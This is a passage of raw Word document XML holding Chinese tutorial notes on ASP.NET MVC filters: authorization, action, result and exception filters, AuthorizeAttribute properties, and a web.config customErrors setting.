                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>默认实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>认证过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>IAuthenticationFilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>最先运行，在其他任何过滤器或动作方法之前运行，但在授权过滤器之后可以在此运行。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pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>授权过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>IAuthorizationFilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>AuthorizeAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>在认证之后，其他过滤器或动作方法之前运行。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pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>动作过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>IActionFilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>ActionFilterAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>在动作方法之前和之后运行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pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>结果过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>IResultFilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>ActionFilterAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>在动作结果被执行之前和之后运行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pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>异常过滤器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>IExceptionFilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>HandleErrorAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>仅在一个过滤器，动作方法或动作结果抛出异常时运行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在MVC框架调用一个动作之前，会首先检测该方法的定义，以查看它是否具有实现上述接口的注解属性。如果有，那么便在请求处理程序的响应点上调用接口所定义的方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>授权过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>授权过滤器会执行你的授权策略，以确保动作方法只被已认证用户调用，它有两个属性来指定授权策略：</w:t>
      </w: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992"/>
        <w:gridCol w:w="85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pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8589" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>tring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8589" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>一个逗号分隔的用户名列表，允许这些用户访问这些动作方法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pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8589" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>一个逗号分隔的角色列表，为了访问该动作方法，用户至少是角色之一</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异常过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在调用一个动作方法时，如果抛出未处理的异常，异常过滤器才会运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异常过滤器必须实现IExceptionFilter接口，实现该接口需要实现OnException()方法，该方法有一个ExceptionContext类型参数，可以获取控制器和异常的信息，并能控制对异常的处理行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其中Result属性可以决定对异常的处理行为，一般传递一个重定向对象跳转到404页面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ExceptionHandled可以将异常标记为“已处理”，这样就不会显示恐怖的“黄色屏幕”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在实际项目中，我们往往不需要自己创建异常过滤器，因为微软已经创建好了HandleErrorAttribute这个异常处理类。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>常用的属性有：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ExceptionType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过指定捕获特定的异常，忽略其他异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:ind w:firstLine="1471" w:firstLineChars="700"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指定异常页面的视图名称。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在使用异常过滤器前需要在web.config中添加如下属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>customErrors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>defaultRedirect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/Content/ErrorPage.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>customErrors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将mode设置为On是为了在调试期间也能会拦截异常，默认是RemoteOnly，意味开发期间不会拦截异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
